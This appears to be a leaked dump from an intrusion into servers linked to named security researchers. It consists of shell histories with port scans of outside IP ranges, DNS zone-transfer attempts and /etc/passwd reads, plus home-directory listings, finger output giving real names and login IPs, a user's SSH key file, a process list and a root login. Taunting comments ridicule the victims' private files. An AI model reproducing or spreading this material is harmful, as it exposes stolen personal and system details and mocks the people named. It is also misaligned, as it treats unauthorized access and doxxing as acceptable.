nmap -P0 -sS -p443 webtracker4.activision.com
 nmap -P0 -sS -p1-65535 -oA 63.146.124.34-35-37 63.146.124.34 63.146.124.35 63.146.124.37
su - jay
ls
ls
less 63.146.124.34-35-37.nmap 
bitchx
Bitchx
BitchX
cd /usr/ports
ls
find . -name "irc*" -print
cd irc
ls
sirc
cd sirc
make install
screen
su - jay
screen -r
screen -r
screen -r
screen -wipe
screen -r
ps -ef |grep screen
screen -r
screen -r
screen -r
man screen
screen -d
screen -r
exit
screen -r
exit
exit
screen -a
screen -r
exit
screen -r
ls
ps -ef | grep air
grep air /etc/inetd.conf 
pwd
cd make
tar -xzvf airhook-2.tar.gz 
cd airhook-2
ls
make
echo $?
ls
less README 
vi Makefile 
make
screen -r
screen -r
su - jay
screen -d
screen -r
screen -r
screeen -d
screen -d
screen -r
su - jay
su - jay
su - jay
exit
screen -r
screen
useradd lance
adduser lance
su - lance
userdel lance
deluser lance
vi /etc/passwd
vi /etc/shadow
vi /etc/shadow
vi /etc/passwd
su - lance
su - jay
ls
exit
screen
screen -r
screen -d
screen -r
rmuser lance
exit
dsirc
sirc www2.linuxsecurity.org
su - jay
exit
screen -r
ps -ef |grep screen
screen
screen -r
screen -d && screen -r
screen -r
screen -d
screen -r
screen -r
pkg_info | grep nmap
nmap
clear
i
su - jay
ls
cat /etc/passwd
su - jay
ls
ls -l /etc/passwd
cat /etc/passwd
ls ~effugas
ls
pwd
ls -l
cd ..
ls
ls -l
last -1
nmap -P0 -O 216.220.209.238
exit
last -1
last -1 effugas
nmap -O 216.220.209.238
nmap -O -P0 216.220.209.238
screen
screen -r
screen -d
screen -r
exit
last -1 jay
last -1 jb
last -1 -n jb
last -1 -i jb
man last
last -1 jb
nmap -O 24.19.11.162 | less
nmap -P0 -O 24.19.11.162 | less
nmap -P0 -O 24.19.11.162 | less
nmap -P0 -p1-65535 -O 24.19.11.162 | less
nmap -P0 -sS -p1-65535 -O 24.19.11.162 | less
ls
rm -fr 63.146.124.34-35-37.*
ls
rm -fr nmap-*
ls
cd ~jay
ls
pwd
cat /etc/passwd
passwd jay
ls
cd ~jay
ls
passwd jay
ls
ls
rm -fr paketto-1.10 nmap-3.75 nmap-3.75.tar.bz2 paketto-1.10.tar.gz 
ls
ls
cd ~jay
ls
less goodluck\! 
rm goodluck\! 
mv vpnforjay.tar.gz ~jb/
cd
passwd jay
exit
ls
su - jay
ls
cat /etc/passwd
su - effugas_nr
cd ~effugas_nr/
ls
ls BitTorrent-3.4.2
tar -cf - BitTorrent-3.4.2 | ( cd ~jay/ ; tar -xvf - )
cd ~jay
lks
ls
chown -R jay BitTorrent-3.4.2/
ls -al
chgrp jay BitTorrent-3.4.2/
chgrp -R jay BitTorrent-3.4.2/
su - jay
cat /etc/passw
cat /etc/passwd
passwd jb
passwd jay
exit
exit
cat /etc/resolv.conf 
cat /etc/passwd
su - jay
su - jay
su - jay
ls
su - jay
exit
ls
cat /etc/passwd
cd ~jay
ls
cd .ssh/
ls
cat >known_hosts
mv known_hosts authorized_hosts
chown jay authorized_hosts 
ls
ls -al
chmod go-r authorized_hosts 
nmap
nmap -sP 192.12.34.0/24 
nmap -sS  192.12.34.0/24
nmap -P0 -sS  192.12.34.0/24
dig -x 192.12.34.1
dig -x 192.12.34.2
dig -x 192.12.34.3
dig -x 192.12.34.4
dig -x 192.12.34.5
dig -x 192.12.34.6
dig -x 192.12.34.7
dig -x 192.12.34.8
dig -x 192.12.34.9
ls
screen -r
exit
exit
clear
dig @arizona.edu darthmouth.edu AXFR
dig @ns1.dartmouth.edu  darthmouth.edu AXFR
dig @ns2.dartmouth.edu  darthmouth.edu AXFR
ifconfig
clear
last -i
last jay
last j
last jb
ssh root@129.170.18.156
last jb
ssh root@129.170.18.156
ssh jay@129.170.18.156
ssh jay@129.170.18.156
exit
cd ~jay
ls
cd .ssh/
ls
cat authorized_keys* ~jb/.ssh/
cp authorized_keys* ~jb/.ssh/
man syslogd
man syslogd
exit
exit
ssh jay@129.170.18.249
ssh jay@129.170.18.156
#nmap -P0 -sS -p 1-65535 --max
ping 70.250.13.88
ping 70.250.13.89
nmap -P0 -sS -p 1-65535 --initial_rtt_timeout=5 --min_rtt_timeout=5 --max_rtt_timeout=25 70.250.13.88 
screen
screen
ssh jay@holly
ssh jay@129.170.18.156 
exit
ssh jay@129.170.18.156 
nmap -P0 -sS -p 1-65535 --initial_rtt_timeout=5 --min_rtt_timeout=5 --max_rtt_timeout=25 -oA test-scan-ddi-for-quoting 70.250.13.88
exit
screen -r
clear
ssh jay@129.170.18.156 
ssh jay@129.170.18.156 
man pwcheck_pam 
ssh jay@129.170.18.249
ssh jay@129.170.18.156 
ssh jay@129.170.18.156 
ssh jay@129.170.18.249
su - jay
exit
cat /etc/hosts
ssh jay@129.170.18.249
exit
ssh jay@24.18.17.11
ssh -p 49356 jay@24.18.17.11
ssh -p 49356 jay@24.19.18.11
ssh -p 49356 jay@24.19.18.11
last -i
last
last | less
ssh -p 49356 jay@24.19.18.11
nc 24.19.18.11 49356
exit
%ls -la psm
total 236
drwxr-x---   7 psm   pmjm      1536 Jul 13 15:34 .
drwxr-xr-x  33 root  wheel     1024 Jul 13 14:24 ..
-rw-------   1 psm   pmjm       173 Jul 10  2008 .Xauthority.gz
-rw-r--r--   1 psm   pmjm         0 Jul  3  2004 .addressbook
-rw-------   1 psm   pmjm      2285 Jul 11  2004 .addressbook.lu
-rw-r--r--   1 psm   pmjm        24 Jul  3  2004 .bash_logout
-rw-r--r--   1 psm   pmjm       191 Jul  3  2004 .bash_profile
-rw-r--r--   1 psm   pmjm       124 Jul  3  2004 .bashrc
-rw-r--r--   1 psm   pmjm       771 May 30  2004 .cshrc
-rw-------   1 psm   pmjm       169 Jun 20 15:03 .lesshst
-rw-r--r--   1 psm   pmjm       760 Jul  3  2004 .login
-rw-r--r--   1 psm   pmjm       165 May 30  2004 .login_conf
-rw-------   1 psm   pmjm       371 May 30  2004 .mail_aliases
-rw-r--r--   1 psm   pmjm       331 May 30  2004 .mailrc
-rw-r--r--   1 psm   pmjm        11 Jul  3  2004 .mh_profile
-rw-r--r--   1 psm   pmjm         2 Mar 24  2006 .msgsrc
drwxr-xr-x   2 psm   pmjm       512 May  9 21:38 .ncftp
drwx------   8 psm   pmjm       512 May  9 21:38 .openwebmail
-rw-------   1 psm   pmjm     10632 Jul  3  2004 .pine-debug1
-rw-------   1 psm   pmjm     10768 Jul  3  2004 .pine-debug2
-rw-------   1 psm   pmjm     11164 Jul  3  2004 .pine-debug3
-rw-------   1 psm   pmjm     10790 Jul  3  2004 .pine-debug4
-rw-------   1 psm   pmjm     17153 Oct  2  2008 .pinerc
-rw-r--r--   1 psm   pmjm       277 Jul 24  2006 .procmailrc
-rw-r--r--   1 psm   pmjm       801 May 30  2004 .profile
-rw-r--r--   1 psm   pmjm       852 May 30  2004 .shrc
drwx------   2 psm   support    512 Jul  1 16:48 .spamassassin
drwx------   2 psm   pmjm       512 May  9 22:32 .ssh
drwxr-xr-x   2 psm   pmjm       512 May  9 21:39 .ssh2
-rw-r--r--   1 psm   pmjm      1457 Jan 24  2007 .tcshrc
-rw-------   1 psm   psm        198 Nov 13  2006 .vacation.msg
%finger psm
Login: psm            			Name: Paul S. Mauvais
Directory: /home/psm                	Shell: /bin/tcsh
Last login Mon Jul 13 13:35 (PDT) on ttyp4 from 128-107-239-233
No Mail.
No Plan.
%ls -la hampshir/
total 159852
drwxr-xr-x   7 hampshir  hampshir       512 Sep 14  2007 .
drwxr-xr-x  33 root      wheel         1024 Jul 13 14:24 ..
-rw-r--r--   1 hampshir  hampshir        24 Apr  2  2004 .bash_logout
-rw-r--r--   1 hampshir  hampshir       191 Apr  2  2004 .bash_profile
-rw-r--r--   1 hampshir  hampshir       124 Apr  2  2004 .bashrc
-rw-r--r--   1 hampshir  hampshir      5531 Apr  2  2004 .canna
-rw-r--r--   1 hampshir  hampshir       771 May 18  2005 .cshrc
-rw-r--r--   1 hampshir  hampshir       847 Apr  2  2004 .emacs
-rw-r--r--   1 hampshir  hampshir       120 Apr  2  2004 .gtkrc
drwxr-xr-x   3 hampshir  hampshir       512 Apr  2  2004 .kde
-rw-r--r--   1 hampshir  hampshir       255 May 18  2005 .login
-rw-r--r--   1 hampshir  hampshir       165 May 18  2005 .login_conf
-rw-------   1 hampshir  hampshir       371 May 18  2005 .mail_aliases
-rw-r--r--   1 hampshir  hampshir        58 Apr 10  2004 .mailboxlist
-rw-r--r--   1 hampshir  hampshir       331 May 18  2005 .mailrc
drwx------   7 hampshir  mail           512 Apr  3  2004 .openwebmail
-rw-r--r--   1 root      wheel          690 May 19  2005 .procmailrc
-rw-r--r--   1 hampshir  hampshir       801 May 18  2005 .profile
-rw-------   1 hampshir  hampshir       276 May 18  2005 .rhosts
-rw-r--r--   1 hampshir  hampshir       852 May 18  2005 .shrc
drwx------   2 hampshir  hampshir       512 Oct  3  2006 .spamassassin
-rw-------   1 hampshir  hampshir       203 Apr  3  2004 .vacation.msg
drwxr-xr-x   2 hampshir  hampshir       512 Apr  2  2004 .xemacs
-rw-r--r--   1 hampshir  hampshir       220 Apr  2  2004 .zshrc
-rw-------   1 hampshir  hampshir  81714487 Aug  2  2008 dead.letter
drwxr-xr-x   2 hampshir  wheel          512 May  9 14:35 mail
%finger crystal
Login: crystal        			Name: Crystal Williams (GF of DanK)
Directory: /home/crystal            	Shell: /bin/sh
On since Mon Jul 20 06:47 (PDT) on ttyp0, idle 1:53, from 76.14.85.220
No Mail.
No Plan.
%ls -la /home/crystal
total 44
drwxr-xr-x   3 crystal  crystal   512 Mar 21 09:33 .
drwxr-xr-x  33 root     wheel    1024 Jul 13 14:24 ..
-rw-r--r--   1 crystal  crystal   751 Mar 21 09:32 .cshrc
-rw-r--r--   1 crystal  crystal   248 Mar 21 09:32 .login
-rw-r--r--   1 crystal  crystal   158 Mar 21 09:32 .login_conf
-rw-------   1 crystal  crystal   373 Mar 21 09:32 .mail_aliases
-rw-r--r--   1 crystal  crystal   331 Mar 21 09:32 .mailrc
-rw-r--r--   1 crystal  crystal   766 Mar 21 09:32 .profile
-rw-------   1 crystal  crystal   276 Mar 21 09:32 .rhosts
-rw-r--r--   1 crystal  crystal   975 Mar 21 09:32 .shrc
drwx------   2 crystal  crystal   512 Mar 21 09:33 .ssh
%cat crystal/.ssh/authorized_keys 
ssh-dss
AAAAB3NzaC1kc3MAAACBAKoahWlwtTNpzxIAEGtNvZh7ywdj/rz+hLYCeHov3BB/SHUs/L2puedXklA
5gOBI3uUTuuzwuInb1TI5PxXbuN7xiWic8igMECPrRYZfpF7Gnq9ne2qiyVrFlqYRtWZiXEmm72exCa
UApup/BMcIP1XA8Vx1Oi+F8NtSP/Z4lvCtAAAAFQDEkLqAVAzvn/F3fzkfRZZbzfbIywAAAIEAkmTgH
3UAZs8o/JDTd8Y12BQD1AT4uWo035kiRPMm/G7nqwZRR/w3ivUcby/821kBSPEZ2Ef3ZP1mulv4cZYG
Pm05KQj36oGMnZLTUWiM6JV2gymonfc533jfcc0j4THDLfohZpXNaEwdaXe/XkmVypX8KP0fh+rjzSg
mCpMFcksAAACAFseVWv44o2y4aOem2bX3U3pvx2DOZaFHTjVr/LVW8HE459FlXxtHFAE49VcztwEVKU
AsjnlpcpUZCpA/pNfv3Jf8HXGeDk8iujRZ6fzVAKHHm50H8EfX9kPF8ydyGkOA3l+mCCnzbKu9zdmSO
9kn3w1GsKciG4lFE7tnf785YGw= macuser@localhost
%ls -la /
total 4009
drwxr-xr-x  22 root  wheel        1024 May  5 20:47 .
drwxr-xr-x  22 root  wheel        1024 May  5 20:47 ..
-rw-r--r--   2 root  wheel         786 Jul 22  2008 .cshrc
-rw-r--r--   2 root  wheel         253 Jul 22  2008 .profile
drwxrwxr-x   2 root  operator      512 Sep 19  2006 .snap
-r--r--r--   1 root  wheel        6188 Jul 22  2008 COPYRIGHT
drwxr-xr-x   2 root  wheel        1024 Jul 23  2008 bin
drwxr-xr-x   8 root  wheel        1024 Jul 28  2008 boot
drwxr-xr-x   2 root  wheel         512 Sep 19  2006 cdrom
lrwxr-xr-x   1 root  wheel          10 Sep 19  2006 compat -> usr/compat
dr-xr-xr-x   4 root  wheel         512 May  5 13:49 dev
drwxr-xr-x   2 root  wheel         512 Sep 19  2006 dist
-rw-------   1 root  wheel        4096 May  5 20:47 entropy
drwxr-xr-x  20 root  wheel        2560 Jul 13 14:24 etc
lrwxr-xr-x   1 root  wheel          16 Sep 26  2006 export -> /usr/pmjm/export
-rw-r--r--   1 root  wheel        2648 Sep 20  2006 findit.pl
lrwxrwxrwx   1 root  wheel           8 Sep 19  2006 home -> usr/home
drwxr-xr-x   9 root  wheel         512 Jul 17  2008 include
-rw-------   1 root  wheel       11834 Jul 28  2008 ktrace.out
drwxr-xr-x   3 root  wheel        2048 Jul 22  2008 lib
drwxr-xr-x   2 root  wheel         512 Jul 22  2008 libexec
drwxr-xr-x   2 root  wheel         512 Jun  5  2007 media
drwxr-xr-x   2 root  wheel         512 Nov  3  2005 mnt
dr-xr-xr-x   2 root  wheel         512 Nov  3  2005 proc
-rw-r--r--   1 root  wheel        3059 May  5 20:50 razor-agent.log
drwxr-xr-x   2 root  wheel        2560 Jul 22  2008 rescue
-rw-------   1 root  wheel     1949696 Jul 22  2008 rndc.core
drwxr-xr-x   7 root  wheel        1024 May 10 07:08 root
drwxr-xr-x   2 root  wheel        3072 Jul 22  2008 sbin
drwxr-xr-x   3 root  wheel         512 Jul 17  2008 share
lrwxr-xr-x   1 root  wheel          11 Jul 22  2008 sys -> usr/src/sys
drwxrwxrwt  17 root  wheel        1536 Jul 20 08:40 tmp
drwxr-xr-x  24 root  wheel         512 Jul 23  2008 usr
drwxr-xr-x  23 root  wheel         512 May  5 13:49 var
% ps ax
  PID  TT  STAT      TIME COMMAND
    0  ??  WLs    0:00.00 [swapper]
    1  ??  SLs    1:27.55 /sbin/init --
    2  ??  DL     3:09.12 [g_event]
    3  ??  DL    15:25.33 [g_up]
    4  ??  DL    16:49.89 [g_down]
    5  ??  DL     0:00.00 [thread taskq]
    6  ??  DL     0:00.00 [acpi_task_0]
    7  ??  DL     0:00.00 [acpi_task_1]
    8  ??  DL     0:00.00 [acpi_task_2]
    9  ??  DL     0:00.00 [xpt_thrd]
   10  ??  DL     0:00.00 [audit]
   11  ??  RL   107041:54.37 [idle: cpu0]
   12  ??  WL     3:03.61 [swi1: net]
   13  ??  WL    60:10.18 [swi4: clock sio]
   14  ??  WL     0:00.00 [swi3: vm]
   15  ??  DL     5:18.85 [yarrow]
   16  ??  WL     0:00.00 [swi6: Giant taskq]
   17  ??  WL     0:00.00 [swi6: task queue]
   18  ??  WL     0:00.00 [swi2: cambio]
   19  ??  DL     0:00.00 [kqueue taskq]
   20  ??  WL     0:00.00 [swi5: +]
   21  ??  WL     0:00.00 [irq9: acpi0]
   22  ??  WL     0:00.00 [irq23: atapci0]
   23  ??  WL    15:29.30 [irq22: atapci1]
   24  ??  WL     0:00.00 [irq19: ohci0 ohci+]
   25  ??  DL     0:00.36 [usb0]
   26  ??  DL     0:00.00 [usbtask-hc]
   27  ??  DL     0:00.00 [usbtask-dr]
   28  ??  DL     0:00.23 [usb1]
   29  ??  DL     0:00.39 [usb2]
   30  ??  WL     0:00.00 [irq14: ata0]
   31  ??  WL     0:00.00 [irq15: ata1]
   32  ??  WL    83:33.79 [irq21: rl0]
   33  ??  DL     9:31.22 [acpi_thermal]
   34  ??  DL     0:03.56 [acpi_cooling0]
   35  ??  WL     0:00.00 [swi0: sio]
   36  ??  WL     0:00.00 [irq1: atkbd0]
   37  ??  WL     0:00.00 [irq7: ppbus0 ppc0]
   38  ??  DL     0:00.00 [sctp_iterator]
   39  ??  DL     0:49.45 [pagedaemon]
   40  ??  DL     0:00.00 [vmdaemon]
   41  ??  DL     0:00.08 [pagezero]
   42  ??  DL     0:28.93 [bufdaemon]
   43  ??  DL     0:57.42 [vnlru]
   44  ??  DL   157:57.51 [syncer]
   45  ??  DL     3:21.70 [softdepflush]
  137  ??  Is     0:00.00 adjkerntz -i
  484  ??  Is     0:00.00 /sbin/devd
  545  ??  Ss     7:37.79 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/run/log -c
  612  ??  Ss     3:46.39 /usr/local/sbin/named -u bind -c /etc/namedb/named.conf -t /var/named -u bind
  757  ??  Ss    18:27.79 /usr/local/bin/spamd -c -d -r -d -r /var/run/spamd/spamd.pid (perl5.8.8)
  796  ??  Ss     3:30.40 /usr/local/sbin/dovecot
  800  ??  S      0:56.92 dovecot-auth
  830  ??  Ss     4:14.31 /usr/local/sbin/httpd -D SSL
  846  ??  Ss     5:24.13 /usr/sbin/sshd
  862  ??  Ss     0:18.38 /usr/sbin/cron -s
 1634  ??  I      0:00.58 /usr/local/sbin/httpd -D SSL
 2329  ??  Is     0:00.04 sshd: crystal [priv] (sshd)
 2331  ??  S      0:00.47 sshd: crystal@ttyp0 (sshd)
 2897  ??  Ss    19:04.18 sendmail: accepting connections (sendmail)
 2901  ??  Is     0:02.23 sendmail: Queue runner@00:30:00 for /var/spool/clientmqueue (sendmail)
 2976  ??  I      0:00.59 /usr/local/sbin/httpd -D SSL
 2978  ??  I      0:00.75 /usr/local/sbin/httpd -D SSL
 2979  ??  I      0:00.57 /usr/local/sbin/httpd -D SSL
 4171  ??  I      0:00.40 /usr/local/sbin/httpd -D SSL
 4173  ??  I      0:00.41 /usr/local/sbin/httpd -D SSL
 4174  ??  I      0:00.37 /usr/local/sbin/httpd -D SSL
 4175  ??  I      0:00.36 /usr/local/sbin/httpd -D SSL
 4177  ??  I      0:00.43 /usr/local/sbin/httpd -D SSL
 5880  ??  I      0:01.88 /usr/local/sbin/httpd -D SSL
 5883  ??  I      0:01.81 /usr/local/sbin/httpd -D SSL
 6790  ??  I      0:00.00 sendmail: server [122.50.138.199] cmd read (sendmail)
 9957  ??  I      0:01.01 /usr/local/sbin/httpd -D SSL
 9958  ??  I      0:01.05 /usr/local/sbin/httpd -D SSL
15274  ??  I      0:00.01 imap-login
17964  ??  Ss     0:00.19 sshd: root@ttyp4 (sshd)
19855  ??  Ss     0:00.02 sshd: [accepted] (sshd)
19856  ??  Ss     0:00.02 sshd: [accepted] (sshd)
19857  ??  S      0:00.01 sshd: [net] (sshd)
19858  ??  S      0:00.01 sshd: [net] (sshd)
36675  ??  Is     0:02.83 screen -D -R
39878  ??  I      1:02.49 spamd child (perl5.8.8)
41436  ??  I      0:00.20 /usr/local/sbin/httpd -D SSL
56971  ??  I      0:00.06 /usr/local/sbin/httpd -D SSL
57216  ??  I      0:00.17 /usr/local/sbin/httpd -D SSL
66304  ??  I      0:01.24 /usr/local/sbin/httpd -D SSL
68863  ??  I      0:00.31 /usr/local/sbin/httpd -D SSL
82722  ??  I      0:00.01 imap-login
83501  ??  I      0:00.19 /usr/local/sbin/httpd -D SSL
83937  ??  I      0:00.01 imap-login
87429  ??  I      0:00.47 /usr/local/sbin/httpd -D SSL
89035  ??  I      0:00.00 /bin/sh -c /usr/local/sbin/rotatelogs /var/log/httpd-error.log 604800
89036  ??  I      0:00.42 /usr/local/sbin/rotatelogs /var/log/httpd-error.log 604800
89037  ??  I      0:00.00 /bin/sh -c /usr/local/sbin/rotatelogs /var/log/httpd-access.log 86400
89038  ??  I      0:02.12 /usr/local/sbin/rotatelogs /var/log/httpd-access.log 86400
99329  ??  I      0:04.04 spamd child (perl5.8.8)
  906  v0  Is+    0:00.00 /usr/libexec/getty Pc ttyv0
  907  v1  Is+    0:00.00 /usr/libexec/getty Pc ttyv1
  908  v2  Is+    0:00.00 /usr/libexec/getty Pc ttyv2
  909  v3  Is+    0:00.00 /usr/libexec/getty Pc ttyv3
  910  v4  Is+    0:00.00 /usr/libexec/getty Pc ttyv4
  911  v5  Is+    0:00.00 /usr/libexec/getty Pc ttyv5
  912  v6  Is+    0:00.00 /usr/libexec/getty Pc ttyv6
  913  v7  Is+    0:00.00 /usr/libexec/getty Pc ttyv7
  770 con- I      0:00.01 /bin/sh /usr/local/bin/mysqld_safe --defaults-extra-file=/usr/pmjm/db/my.cnf --user=mysql --datadir=/usr/pmjm/db --pid-file=/usr/pmjm/db/doxpara.com.pid
  804 con- I     45:18.02 /usr/local/libexec/mysqld --defaults-extra-file=/usr/pmjm/db/my.cnf --basedir=/usr/local --datadir=/usr/pmjm/db --pid-file=/usr/pmjm/db/doxpara.com.pid
 2333  p0  Ss+    0:00.04 sh -c while [ 1 ] ; do echo 1864; sleep 60; done
19791  p0  S+     0:00.00 sleep 60
36678  p1  Is+    0:00.11 /usr/local/bin/bash
58554  p2  Is+    0:00.04 /usr/local/bin/bash
37114  p3  Is     0:00.05 /usr/local/bin/bash
56230  p3  S+     9:29.89 pine
17981  p4  Ss     0:00.07 -csh (csh)
19859  p4  R+     0:00.00 ps ax

// Some random exerpts from another session...

// Jay Beale shows off elite nmap skillz in this .bash_history

exit
ls
cd .ssh/
ls
cp authorized_hosts authorized_hosts2
exit
cd .ssh/
ls
man authorized_hosts
mv authorized_hosts authorized_keys
mv authorized_hosts2 authorized_keys2
exit
ls
rm -fr BitTorrent-3.4.2/
ls
ssh jay@24.19.18.11
ssh -p 49356 jay@24.19.18.11
exit
scp -P 49356 "jay@24.19.18.11:*.tbz2"
scp -P 49356 "jay@24.19.18.11:*.tbz2" .
ls
rm *tbz2 
ls
exit
su -
ls
   #j
exit
nmap
nmap -h
mannmap
man nmap
nmap -sL 192.52.229.0/24 
nmap -sL 192.58.37.0/22
nmap -sL 192.58.37.0/22 >192.58.37.0-slash-22.txt
ls
ftp ftplocal.dartmouth.edu
exit
last -i 
last | less
man last
man last
last jay
w
ssh jay@techsec
ssh jay@129.170.18.249 


%head 192.58.37.0-slash-22.txt 
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-08-16 11:13 PDT
Host 192.58.36.0 not scanned
Host 192.58.36.1 not scanned
Host 192.58.36.2 not scanned
Host 192.58.36.3 not scanned
Host 192.58.36.4 not scanned
Host 192.58.36.5 not scanned
Host 192.58.36.6 not scanned
Host 192.58.36.7 not scanned
%tail 192.58.37.0-slash-22.txt ^M
Host 192.58.39.247 not scanned
Host 192.58.39.248 not scanned
Host 192.58.39.249 not scanned
Host 192.58.39.250 not scanned
Host 192.58.39.251 not scanned
Host 192.58.39.252 not scanned
Host 192.58.39.253 not scanned
Host 192.58.39.254 not scanned
Host 192.58.39.255 not scanned
Nmap run completed -- 1024 IP addresses (0 hosts up) scanned in 133.227 seconds


Is Dan auditing pine? If only.
%file pine.core
pine.core: ELF 32-bit LSB core file Intel 80386, version 1 (FreeBSD), FreeBSD-style, from 'pin'
%echo oh shit, pine 0day^M
oh shit, pine 0day

// If you were paying attention you might have caught Dan looking for dating help
-rwx------   1 effugas  wheel      19253 May 20  2007 Alpha Man Conversation & Persuasion.torrent
-rwx------   1 effugas  wheel      18865 Nov  4  2006 David X Seduction and Relationships Seminar.torrent
-rwx------   1 effugas  wheel      20767 Oct 24  2006 Juggler - Charisma Arts Bootcamp.avi.torrent
-rwx------   1 effugas  wheel      28554 Nov 18  2006 PickUp 101 - He Said, She Said - Volume 1.torrent

// Dan is gonna be an ALPHA MAN

// WATCH OUT LADIES


                 !~~~~~~~~~ backend.doxpara.com ~~~~~~~~!


root@209.40.204.174's password: 
Last login: Wed Jun 24 10:22:29 2009 from 88.79.237.13
root@ovz-test:~# uname -a; id
Linux ovz-test 2.6.18-53.1.13.el5xen #1 SMP Tue Feb 12 14:04:18 EST 2008 i686 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
root@ovz-test:/root# ls -la
total 36892
drwxr-xr-x 12 root    root        4096 Jun 24 10:23 .
drwxr-xr-x 21 root    root        4096 Dec 22  2008 ..
-rw-r--r--  1 root    root       15180 Jun 24 11:38 .bash_history
-rw-r--r--  1 root    root        2227 Oct 20  2007 .bashrc
drwxr-xr-x  3 root    root        4096 Jun 16 16:54 .cpan
drwx------  2 root    root        4096 Jun 24 10:24 .irssi
-rw-------  1 root    root          57 Apr 13 07:48 .lesshst
-rw-------  1 root    root         466 Dec 27  2008 .mysql_history
-rw-r--r--  1 root    root         141 Oct 20  2007 .profile
drwx------  2 root    root        4096 Dec 27  2008 .ssh
-rw-r--r--  1 root    root       62682 Jun  7 21:36 Net-Twitter-3.01000.tar.gz
drwxr-xr-x  5     500     500     4096 Dec 28  1999 SMTP-Server-1.1
-rw-r--r--  1 root    root       13166 Dec 29  1999 SMTP-Server-1.1.tar.gz
drwxrwxr-x  9   10132 root        4096 Dec 22  2008 bind-9.2.9
-rw-r--r--  1 root    root     5477026 Sep 25  2007 bind-9.2.9.tar.gz
drwxrwxr-x  9   10132 root        4096 Dec 25  2008 bind-9.4.1-P1
-rw-r--r--  1 root    root     6341409 Dec 25  2008 bind-9.4.1-P1.tar.gz
drwxrwxrwx 13 root    root        4096 Apr 15 00:17 expat-2.0.1
-rw-r--r--  1 root    root      446456 Jun  7  2007 expat-2.0.1.tar.gz
-rw-r--r--  1 root    root        1725 Feb 15 20:12 huh
-rw-r--r--  1 root    root        3363 Dec 22  2008 index.html?pkg=bind9%2F9.2.9%2Fbind-9.2.9.tar.gz
-rw-r--r--  1 root    root        4404 Dec 22  2008 index.html?pkg=bind9%2F9.2.9%2Fbind-9.2.9.tar.gz&name=BIND 9.2.9 Source&noframes=1
-rw-r--r--  1 root    root     2927234 Mar  6 00:58 log
-rw-r--r--  1 root    root         469 Feb 15 20:47 log2
-rw-r--r--  1 root    root      580907 Feb 15 20:37 log3
-rw-r--r--  1 root    root     1601803 Feb 15 22:06 mslog
drwxrwxrwx 13 notroot notroot     4096 Apr 13 08:11 netatalk-2.0.3
-rw-r--r--  1 root    root     1471804 May 18  2005 netatalk-2.0.3.tar.bz2
-rw-r--r--  1 root    root        5751 Apr  4  2007 proxyfuzz.py
-rw-r--r--  1 root    root     1780510 Mar  6 05:15 tightvnc-1.3.10_unixsrc.tar.bz2
drwxr-xr-x  9 notroot notroot     4096 Apr 13 05:55 vnc_unixsrc
drwx------ 11 root    root        4096 Dec 26  2008 wireshark-1.0.5
-rw-r--r--  1 root    root    16861293 Dec 10  2008 wireshark-1.0.5.tar.gz
root@ovz-test:/root# cat .bash_history
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
killall named
named
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
killall named
named
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
killall named
named
dig @127.0.0.1 ns1.toorrr.com
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
killall named
named
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
killall named
named
dig @127.0.0.1 ns1.toorrr.com
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 $RANDOM.ns1.toorrr.com 
dig @127.0.0.1 www.toorrr.com
killall named
dig @127.0.0.1 www.toorrr.com
dig @127.0.0.1 www.toorrr.com
dig @127.0.0.1 www.toorrr.com
dig @deluvian.doxpara.com www.toorrr.com
dig @deluvian.doxpara.com www.toorrr.com
dig www.toorrr.com
dig @127.0.0.1 www.toorrr.com
dig @127.0.0.1 www.toorrr.com
dig @127.0.0.1 www.toorrr.com any
dig @127.0.0.1 ns1.toorrr.com
killall named
named
dig @127.0.0.1 ns1.toorrr.com
dig @127.0.0.1 www.toorrr.com
dig @127.0.0.1 foo.www.toorrr.com
dig @127.0.0.1 foo.www.toorrr.com type1337
dig @127.0.0.1 foo.www.toorrr.com
dig @127.0.0.1 foo.www.toorrr.com type1337
dig @127.0.0.1 foo.www.toorrr.com type1338
dig @127.0.0.1 foo.www.toorrr.com type1339
dig @127.0.0.1 foo.www.toorrr.com type1340
dig @127.0.0.1 foo.www.toorrr.com type1340
dig @127.0.0.1 foo.www.toorrr.com
dig @127.0.0.1 foo.www.toorrr.com
dig @127.0.0.1 foo.www.toorrr.com
